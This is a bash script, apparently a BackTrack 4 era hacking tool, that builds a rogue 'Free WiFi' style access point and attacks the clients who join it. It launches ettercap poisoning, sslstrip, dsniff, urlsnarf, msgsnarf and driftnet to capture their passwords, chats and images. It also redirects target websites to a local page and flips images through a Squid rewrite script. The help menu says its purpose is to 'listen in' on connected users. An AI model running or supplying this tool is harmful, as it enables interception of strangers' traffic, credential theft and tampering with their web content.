BK4 Soft AP Upside Down Image

#!/bin/bash

# Colored dialogs
GREEN="\033[1;32m"
RED="\033[1;31m"
END="\033[1;37m"

clear
echo -e "For this to run please ensue that you know what "
echo 'card is connected to the internet'
echo 'and what card is in Monitor mode'
echo


# Download and install Apache2 only if it isn't installed
if [ -f /usr/sbin/apache2 ] && [ -f /usr/sbin/apache2ctl ];then
echo -e ""$GREEN"Apache2 (Web server) found in your system"$END""
echo;else
echo -e ""$RED"Installing Apache2 - Web server"$END""
apt-get install -y apache2 apache2-mpm-prefork apache2.2-common
echo
# apache2 2.2.9-7ubuntu3.2 [45.1kB]
# apache2.2-common 2.2.9-7ubuntu3.2 [778kB]
# apache2-mpm-prefork 2.2.9-7ubuntu3.2 [236kB]
fi

# Download and install Mogrify only if it isn't installed
if [ -f /usr/bin/mogrify ];then
echo -e ""$GREEN"ImageMagick's Mogrify found in your system"$END"";else
echo -e ""$RED"Installing ImageMagick"$END""
apt-get install -y imagemagick
fi

# Download and install Squid3 only if it isn't installed
if [ -f /usr/sbin/squid3 ];then
echo -e ""$GREEN"Squid3 (Proxy caching server for web clients)"
echo -e "found in your system"$END""
echo;else
echo -e ""$RED"Installing Squid3 - Proxy caching server for web clients"$END""
apt-get install -y squid3 squid3-common
# squid3-common 3.0.STABLE7-1ubuntu1 [225kB]
# squid3 3.0.STABLE7-1ubuntu1 [873kB]
fi

echo 'Setting up the folders...'
echo
export HOME_DIR="/root/Fake_AP"
export TMP_DIR="/root/Fake_AP/tmp/"
export DAY_DIR=$HOME_DIR"/$(date +%d-%m-%y_%T)"
export REDIR="off"
# Making working and backup directory
if [ ! -d $HOME_DIR ];then
mkdir $HOME_DIR
mkdir $TMP_DIR
fi

touch /var/run/dhcpd.pid && chmod 777 /var/run/dhcpd.pid

mkdir $DAY_DIR
mkdir $DAY_DIR"/DriftNet"
mkdir $DAY_DIR"/Dsniff"
mkdir $DAY_DIR"/Ettercap"
mkdir $DAY_DIR"/SslStrip"

echo -n "Enter the name of the wireless card that is connected to the internet, for example:- wlan0: "
read -e wlan

export GATEWAY="`/sbin/route | grep 'default'| awk '{print $2}'`"
export IPADD="`/sbin/ifconfig $wlan| grep 'inet addr' | awk '{print $2}' | sed -e 's/.*://'`"

echo -n "Enter the name of the wireless card that is in monitor mode, for example:- ath0: "
read -e MON

echo -n "Enter the ESSID you would like your rogue AP to be called, for example:- Free WiFi: "
read -e AP

modprobe tun

#airbase-ng is going to create our fake AP with the SSID we specified
xterm -bg black -fg yellow -e airbase-ng -c 6 -e "$AP" $mon  &

sleep 3

echo Configuring interface created by airdrop-ng
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface...'
echo
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE

echo 'Creating a dhcpd.conf to assign addresses to clients that connect to us...'
echo
echo "default-lease-time 600;" > $HOME_DIR/dhcpd.conf
echo "max-lease-time 720;"  >> $HOME_DIR/dhcpd.conf
echo "ddns-update-style none;" >> $HOME_DIR/dhcpd.conf
echo "authoritative;"  >> $HOME_DIR/dhcpd.conf
echo "log-facility local7;"  >> $HOME_DIR/dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {"  >> $HOME_DIR/dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;"  >> $HOME_DIR/dhcpd.conf
echo "option routers 10.0.0.1;"  >> $HOME_DIR/dhcpd.conf
echo "option domain-name-servers $GATEWAY;"  >> $HOME_DIR/dhcpd.conf
echo "}"  >> $HOME_DIR/dhcpd.conf

echo 'DHCP server starting on our airdrop-ng interface (at0)'
echo

xterm -bg black -fg blue -e dhcpd3 -f -cf $HOME_DIR/dhcpd.conf at0 &
echo "Launching DHCP entries log"
echo
xterm -bg black -fg red -e tail -f /var/log/messages &
echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
echo
xterm -bg black -fg white -e ettercap -T -q -p -l $DAY_DIR/Ettercap/ettercap -i at0 // // &
sleep 8

echo 'Configuring ip forwarding'
echo
echo "1" > /proc/sys/net/ipv4/ip_forward

echo 'Launching various tools'
xterm  -rightbar -bg black -fg green -e sslstrip -a -k -f --write $DAY_DIR/SslStrip/ssl.log &
xterm  -rightbar -bg black -fg green -e urlsnarf  -i at0 &
xterm  -rightbar -bg black -fg green -e dsniff -m -i at0 -d -w $DAY_DIR/Dsniff/dsniff.log &

sleep 5

echo
	showMenu () {
	clear
	echo
	echo ""
    	echo -e "	Fake AP Name:	""$RED"$AP"$END"
	echo -e "	IP Address:	"$RED"$IPADD""$END"
	echo -e "	Gateway:	"$RED"$GATEWAY""$END"

	if [ "$REDIR" == "on" ];then
		echo -e "	$website being redirected to /Var/www/index.html"
	fi
	echo ""
	echo ""
	echo "		1) Read Ettercap Log"
	echo "		2) Read DSniff Log"
	echo "		3) Start MSN Logger"
	echo "		4) Start DriftNet"
	if [ "$REDIR" == "off" ];then
		echo "		5) Redirect"
	elif [ "$REDIR" == "on" ];then
		echo "		5) Turn Redirect Off"
	fi
	echo "		6) Flip Images Upside down"
	echo "		7) Help"
	echo "		8) Exit"

	echo

}
while [ 1 ]
do
	showMenu
	read CHOICE
	case "$CHOICE" in
	"1")
		echo "Loading up the Ettercap Log";
		konsole --noclose -T "Etterlog" -e etterlog -p $DAY_DIR/Ettercap/ettercap.eci
		;;
	"2")
		echo "Loading up the DSniff Log";
		konsole --noclose -T "DSniff" -e dsniff -r $DAY_DIR/Dsniff/dsniff.log
		;;
	"3")
		xterm  -T "IM Chat" -e msgsnarf -i at0 &
		;;
	"4")
		xterm  -rightbar -bg black -fg green -e driftnet  -v -a -i at0 -d $TMP_DIR/ &
		;;
	"5")

		if  [ "$REDIR" == "off" ];then

			clear
			echo -n "Enter the Website to set as target: "
			read -e website
			iptables -t nat -A PREROUTING -p tcp -d $website --dport 80 -j DNAT --to 10.0.0.1:80

			 /etc/init.d/apache2 start

			export REDIR="on"
			echo ""
			echo "Done..."
			echo ""
			echo "All requests for $website will now be redirected to 10.0.0.1/index.html"
			sleep 5

		elif  [ "$REDIR" == "on" ];then
			/etc/init.d/apache2 stop
			iptables --flush
			iptables --table nat --flush
			iptables --delete-chain
			iptables --table nat --delete-chain
			iptables -P FORWARD ACCEPT
			iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE
			export REDIR="off"
		fi
		;;

	"6")


cat > /usr/local/bin/redirect.pl << "EOF"
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while (<>) {
        chomp $_;
        if ($_ =~ /(.*\.jpg)/i) {
                $url = $1;
                system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.jpg", "$url");
                system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.jpg");
                print "http://10.0.0.1/images/$pid-$count.jpg\n";
        }
        elsif ($_ =~ /(.*\.gif)/i) {
                $url = $1;
                system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.gif", "$url");
                system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.gif");
                print "http://10.0.0.1/images/$pid-$count.gif\n";

        }
        elsif ($_ =~ /(.*\.png)/i) {
                $url = $1;
                system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.png", "$url");
                system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.png");
                print "http://10.0.0.1/images/$pid-$count.png\n";

        }
        elsif ($_ =~ /(.*\.bmp)/i) {
                $url = $1;
                system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.bmp", "$url");
                system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.bmp");
                print "http://10.0.0.1/images/$pid-$count.bmp\n";

        }
        else {
                print "$_\n";;
        }
        $count++;
}
EOF
# Make it executable
chmod 755 /usr/local/bin/redirect.pl
if [ ! -d /var/www/images ];then
mkdir /var/www/images
chown -R www-data:www-data /var/www
chmod -R 1777 /var/www
usermod -aG proxy www-data;else
rm /var/www/images/*
fi

sed '39s%.*%url_rewrite_program /usr/local/bin/redirect.pl%g' /etc/squid3/squid.conf > /etc/squid3/squid1.conf && mv /etc/squid3/squid1.conf /etc/squid3/squid.conf
sed '40s%.*%redirect_children 12%g' /etc/squid3/squid.conf > /etc/squid3/squid1.conf && mv /etc/squid3/squid1.conf /etc/squid3/squid.conf

/etc/init.d/apache2 start
/etc/init.d/squid3 start


iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface $wlan -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $IPADD
#Transparent Squid3
iptables -t nat -A PREROUTING -i at0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.1:3128
iptables -t nat -A PREROUTING -i $wlan -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128


		;;

	"7")	# Instructions
		clear
		echo "Instructions"
		echo ""
		echo "This utility is used to create a Fake Access Point."
		echo "it will allow others to connect to the internet through you"
		echo "and allow you to listen in to what they are up to"
		echo ""
		echo "Once it has been run, it will create a new folder at /root/"
		echo "in there it will create a DHCPD.CONF file,A TMP directory for the storage"
		echo "of images from DRIFTNET and a working directoy named with the date and time"
		echo "of the start of the program. when you close the script all images from TMP"
		echo "will be moved into the relavant working directory. this is also where all"
		echo "logs are saved"
		echo ""
		echo "Requirments:-"
		echo "1) You will need to be connected to the internet,either by Lan or Wireless"
		echo "2) Have another wireless card already set in monitor mode"
		echo ""
		echo "How To:-"
		echo "If you are reading this then you should already have the basics set up"
		echo "That being a Fake AP set up with a name of your choice"
		echo "You should be able to have clients connect to it and be issued a IP address"
		echo "There should also be a number of Xterm windows showing different statistics"
		echo "I.e. anything being reported by SSLSTRIP,DSNIFF,URLSNARF,ETTERCAP and DHCP Requests"
		echo ""
		echo "Along with these instructions on the menu, there is options to read the ouput"
		echo "from the Ettercap and Dsniff programs"
		echo ""
		echo "To start MSGSNARF to listen into various chat programs, although im sure this has"
		echo "been set up correctly i have not managed to sniff anything yet"
		echo ""
		echo "DRIFTNET has been included, All images are automatically saved to the TMP folder"
		echo "and moved to the working directory on closure of the script."
		echo ""
		echo "To enable routing."
		echo "Once selected it will ask you for a target website. it will then load up Apache2"
		echo "and redirect any traffic thats destined for the target website to 10.0.0.1. you will"
		echo "you will have to make sure that you have an index.html page in there for it to work "
		echo "or it will come up with a 404 page not found error. I am still working on how to send"
		echo "all traffic to that address, as in a Captive Portal setup"
		echo ""
		echo "Press any key to continue"
		echo -n
		read

		;;
	"8")
		echo "******************************************************************";
		echo "*******Now Shutting Down All Windows********";
		echo "*************And saving logs****************";
		echo "******************************************************************";
		mv $TMP_DIR*.* $DAY_DIR/DriftNet/

		sleep 3
		#stop the APACHE server
		/etc/init.d/apache2 stop
		#stop squid
		/etc/init.d/squid3 stop
		# reset all IPTABLES
		iptables --flush
		iptables --table nat --flush
		iptables --delete-chain
		iptables --table nat --delete-chain
		iptables -P FORWARD ACCEPT
		iptables -t nat -A POSTROUTING -o $wlan -j MASQUERADE
		sleep 3
		killall -9  dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf dsniff xterm ;

		exit 0
		;;
	esac
done